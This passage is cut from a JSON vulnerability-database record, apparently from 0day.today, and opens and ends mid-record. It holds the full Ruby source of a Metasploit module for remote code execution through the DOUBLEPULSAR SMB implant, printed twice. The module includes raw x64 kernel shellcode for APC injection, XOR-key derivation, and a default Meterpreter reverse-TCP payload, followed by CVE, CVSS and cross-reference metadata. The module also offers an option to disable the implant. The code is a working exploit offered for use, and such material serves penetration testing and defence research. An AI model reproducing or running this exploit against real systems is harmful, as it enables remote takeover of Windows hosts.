proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-03] #"}, "lastseen": "2021-10-02T22:16:00", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "ebed9644652d0880017db5969813fd72", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-04T06:21:04", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", 
"1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", 
"TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-04T06:21:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-04T06:21:04", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 
'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
